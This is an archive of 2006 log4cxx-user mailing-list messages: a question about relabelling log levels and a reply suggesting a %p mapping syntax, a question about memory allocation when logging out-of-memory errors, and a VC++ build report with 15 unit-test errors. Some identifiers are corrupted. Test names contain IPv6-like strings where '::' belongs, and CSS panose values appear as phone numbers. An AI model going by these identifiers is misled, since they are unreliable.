Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C6DE25.3BDF4BFA" X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0 Subject: Change log-level String Date: Fri, 22 Sep 2006 10:58:12 +0200 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Change log-level String Thread-Index: AcbeJTv6zWDD6+3ySKalM/cL+pqmfA== From: "CARLOS GUTIERREZ GARCIA" <[email protected]> To: <[email protected]> X-Virus-Scanned: [email protected] X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C6DE25.3BDF4BFA Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi all, =20 I'd like to know if it is possible to change the printed label associated to each log level in the output messages. For instance, I want the literal 'INFOR' to be printed instead of 'INFO' when a message with log level INFO (Logger.info()) is sent. =20 Regards. ------_=_NextPart_001_01C6DE25.3BDF4BFA Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 10 (filtered)"> <style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EstiloCorreo17 {font-family:Arial; color:windowtext;} @page Section1 {size:612.0pt 792.0pt; margin:70.85pt 3.0cm 70.85pt 3.0cm;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DES link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'>Hi all,</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = style=3D'font-size: 12.0pt'>&nbsp;</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = lang=3DEN-GB style=3D'font-size:12.0pt'>I&#8217;d like to know if it is possible to = change the printed label associated to each log level in the output = messages.</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = lang=3DEN-GB style=3D'font-size:12.0pt'>For instance, I want the literal = &#8216;INFOR&#8217; to be printed instead of &#8216;INFO&#8217; when a message with log = level INFO (Logger.info()) is sent.</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = lang=3DEN-GB style=3D'font-size:12.0pt'>&nbsp;</span></font></p> <p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span = lang=3DEN-GB style=3D'font-size:12.0pt'>Regards.</span></font></p> </div> </body> </html> =00 ------_=_NextPart_001_01C6DE25.3BDF4BFA-- From [email protected] Fri Sep 22 20:34:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66874 invoked from network); 22 Sep 2006 20:34:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 22 Sep 2006 20:34:52 -0000 Received: (qmail 9505 invoked by uid 500); 22 Sep 2006 20:34:51 -0000 Delivered-To: [email protected] Received: (qmail 9489 invoked by uid 500); 22 Sep 2006 20:34:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 9473 invoked by uid 99); 22 Sep 2006 20:34:51 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Sep 2006 13:34:50 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=0.8 required=5.0 tests=INFO_TLD Received-SPF: error (idunn.apache.osuosl.org: domain apache.org from 161.129.204.104 cause and error) Received: from [161.129.204.104] ([161.129.204.104:29510] helo=smtp113.sbc.mail.mud.yahoo.com) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 3F/F4-06791-6D844154 for <[email protected]>; Fri, 22 Sep 2006 13:34:31 -0700 Received: (qmail 55410 invoked from network); 22 Sep 2006 20:34:18 -0000 Received: from unknown (HELO ?161.129.204.104?) ([email protected]@161.129.204.104 with plain) by smtp113.sbc.mail.mud.yahoo.com with SMTP; 22 Sep 2006 20:34:17 -0000 Mime-Version: 1.0 (Apple Message framework v752.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=WINDOWS-1252; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: quoted-printable From: Curt Arnold <[email protected]> Subject: Re: Change log-level String Date: Fri, 22 Sep 2006 15:34:15 -0500 To: Log4CXX User <[email protected]> X-Mailer: Apple Mail (2.752.2) X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Don't believe there is a mechanism to configure that, but it would be =20= achievable by providing a custom layout class and possibly, by =20 providing a custom PatternConverter for PatternLayout. The %p pattern could be extended to process a trailing parameter to =20 provide mappings of level values something like: %p{10000=3DDIAGNOSTIC, 20000=3DINFOR, 30000=3DBAD} or %p{10000, 20000, 30000}{DIAGNOSTIC, INFOR, BAD} If you'd like to pursue that course, I would start a discussion on =20 log4j-dev since I like log4j to take the lead in considering new =20 features. On Sep 22, 2006, at 3:58 AM, CARLOS GUTIERREZ GARCIA wrote: > Hi all, > > > I=92d like to know if it is possible to change the printed label =20 > associated to each log level in the output messages. > > For instance, I want the literal =91INFOR=92 to be printed instead of =20= > =91INFO=92 when a message with log level INFO (Logger.info()) is sent. > > > Regards. > > From [email protected] Thu Sep 28 18:03:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37315 invoked from network); 28 Sep 2006 18:03:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Sep 2006 18:03:31 -0000 Received: (qmail 35815 invoked by uid 500); 28 Sep 2006 18:03:30 -0000 Delivered-To: [email protected] Received: (qmail 35793 invoked by uid 500); 28 Sep 2006 18:03:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 35782 invoked by uid 99); 28 Sep 2006 18:03:29 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 28 Sep 2006 11:03:29 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; domainkeys=good X-ASF-Spam-Status: No, hits=4.8 required=5.0 tests=DNS_FROM_RFC_ABUSE,DNS_FROM_RFC_POST,DNS_FROM_RFC_WHOIS,HTML_MESSAGE DomainKey-Status: good X-DomainKeys: Ecelerity dk_validate implementing draft-delany-domainkeys-base-01 Received: from [161.129.204.104] ([161.129.204.104:47548] helo=web82007.mail.mud.yahoo.com) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id C3/39-17533-B6E0C154 for <[email protected]>; Thu, 28 Sep 2006 11:03:24 -0700 Received: (qmail 60902 invoked by uid 60001); 28 Sep 2006 18:03:18 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=3LwVWHR4R4G2CGQtvcPRExALFmXOuUGqfQtBOUdFFXQV6OVzkfHySWzKXVZBt23PQHN3L8OyS4cZCPfryNVKU8MWCJy/mjnwuJXOJUhYmdl95KjS7g5M5KKw8skgJ2A4XPRpR1EF9O49DjS9uj9ZaJisg02XlLaTmpCx/IfbtAM= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web82007.mail.mud.yahoo.com via HTTP; Thu, 28 Sep 2006 11:03:18 PDT Date: Thu, 28 Sep 2006 11:03:18 -0700 (PDT) From: jack wu <[email protected]> Subject: will i be able to log out of memory errors? To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1365327156-1159466598=:58030" Content-Transfer-Encoding: 8bit X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --0-1365327156-1159466598=:58030 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit my question is: when i call LOG4CXX_LOG(...); will the logger internally allocate any memory before writing the message to my log file? since i am already out of memory, subsequent memory allocation attempts will fail and the last error message may be lost. thanks. jack. --------------------------------- Get your email and more, right on the new Yahoo.com --0-1365327156-1159466598=:58030 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit my question is: when i call LOG4CXX_LOG(...); will the logger internally allocate any memory before writing the message to my log file? since i am already out of memory, subsequent memory allocation attempts will fail and the last error message may be lost.<br><br><br><br>thanks.<br><br>jack.<p>&#32; <hr size=1>Get your email and more, right on the <a href="http://us.rd.yahoo.com/evt=42973/*http://www.yahoo.com/preview"> new Yahoo.com</a> --0-1365327156-1159466598=:58030-- From [email protected] Thu Sep 28 19:14:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53102 invoked from network); 28 Sep 2006 19:14:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Sep 2006 19:14:53 -0000 Received: (qmail 47117 invoked by uid 500); 28 Sep 2006 19:14:52 -0000 Delivered-To: [email protected] Received: (qmail 47095 invoked by uid 500); 28 Sep 2006 19:14:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: "Log4CXX User" <[email protected]> List-Id: <log4cxx-user.logging.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 47081 invoked by uid 99); 28 Sep 2006 19:14:51 -0000 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO EXANPCN4.arinc.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 28 Sep 2006 12:14:50 -0700 Received: from ANPCN1.arinc.com (unverified [161.129.204.104]) by EXANPCN4.arinc.com (Content Technologies SMTPRS 4.3.19) with ESMTP id <[email protected]> for <[email protected]>; Thu, 28 Sep 2006 15:14:21 -0400 Received: from TULMB1.arinc.com ([161.129.204.104]) by ANPCN1.arinc.com with Microsoft SMTPSVC(603)363-6787); Thu, 28 Sep 2006 15:14:03 -0400 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C6E332.42417A85" Subject: ant build error - at test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord on unit test Date: Thu, 28 Sep 2006 14:10:06 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: ant build error - at test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord on unit test Thread-Index: AcbjMbWPtm2BJkKUT4ixX523q8hpsg== From: "Kaneko, Michimaro.* \(MKANEKO\)" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 28 Sep 2006 19:14:03.0737 (UTC) FILETIME=[42ED8490:01C6E332] X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C6E332.42417A85 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I am trying to do build for VC++ 6.0. =20 I am using ant 1.6.5, jdk 1.5. =20 I checked out the svn trunk yesterday and followed the install file. I have cpptasks.jar and ant-contrib.jar in the CLASSPATH. I installed GUN patch, GUN sed and added them on the path. =20 The build did create .lib and .dll, but on the unit test phase, I got the following errors: =20 run-unittest: ... =20 [exec] 2006-09-28 13:59:38,104 DEBUG org.apache.log4j.rolling.SizeBasedRollingTest -Hello--24 [exec] .E.E.E...............................................................log 4cxx: Cannot get information about host: unknown.host.local [exec] ....E.E.E.E.E.E..E.E.E.E......................... =20 =20 [exec] !!!FAILURES!!! [exec] Test Results: [exec] Run: 261 Failures: 0 Errors: 15 =20 =20 [exec] 1) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 2) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord2 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 3) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic1 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 4) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic2 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 5) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestMultiOption (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 6) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger4 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 7) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger5 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 8) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger6 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 9) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger7 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 10) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger8 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 11) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger9 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 12) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger11 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 13) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate1 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 14) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate4 (E)=20 [exec] uncaught exception of unknown type =20 =20 [exec] 15) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatDate5 (E)=20 [exec] uncaught exception of unknown type =20 BUILD FAILED C:\Projects\logging-log4cxx\build.xml:1133: exec returned: 1 =20 I appreciate your help and suggestion. Thank you. =20 Michi ------_=_NextPart_001_01C6E332.42417A85 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <html xmlns:o=3D"urn:schemas-microsoft-com:office:office" = xmlns:w=3D"urn:schemas-microsoft-com:office:word" = xmlns=3D"http://www.w3.org/TR/REC-html40"> <head> <meta http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)"> <style> <!-- /* Font Definitions */ @font-face {font-family:"MS Mincho"; panose-1:(603)363-6787;} @font-face {font-family:"\@MS Mincho"; panose-1:(603)363-6787;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:12.0pt; font-family:"Times New Roman";} a:link, span.MsoHyperlink {color:blue; text-decoration:underline;} a:visited, span.MsoHyperlinkFollowed {color:purple; text-decoration:underline;} span.EmailStyle17 {mso-style-type:personal-compose; font-family:Arial; color:windowtext;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in;} div.Section1 {page:Section1;} --> </style> </head> <body lang=3DEN-US link=3Dblue vlink=3Dpurple> <div class=3DSection1> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I am trying to do build for VC++ 6.0. = &nbsp;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I am using ant 1.6.5, jdk = 1.5.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I checked out the svn trunk yesterday and followed = the install file.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I have cpptasks.jar and ant-contrib.jar in the = CLASSPATH.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I installed GUN patch, GUN sed and added them on the = path.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>The build did create .lib and .dll, but on the unit = test phase,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I got the following = errors:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>run-unittest:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; = &#8230;<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 2006-09-28 = 13:59:38,104 DEBUG org.apache.log4j.rolling.SizeBasedRollingTest = -Hello--24<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] .E.E.E...............................................................log4= cxx: Cannot get information about host: = unknown.host.local<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] ....E.E.E.E.E.E..E.E.E.E.........................<o:p></o:p></span></font= ></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] = !!!FAILURES!!!<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] Test = Results:<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] Run:&nbsp; = 261&nbsp;&nbsp; Failures: 0&nbsp;&nbsp; Errors: 15<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 1) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord (E) <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 2) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestNewWord2 (E) <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 3) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic1 (E) <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 4) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestBasic2 (E) <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 5) test: PatternParserTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestMultiOption (E) <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 6) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger4 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 7) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger5 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp; &nbsp;&nbsp;&nbsp;[exec] 8) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger6 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 9) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger7 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 10) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger8 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] 11) test: FileNamePatternTestCasacf:4db6:5e0b:f386:43a5:35d7:718d:3c8btestFormatInteger9 (E) = <o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>&nbsp;&nbsp;&nbsp;&nbsp; [exec] uncaught exception of unknown type<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; 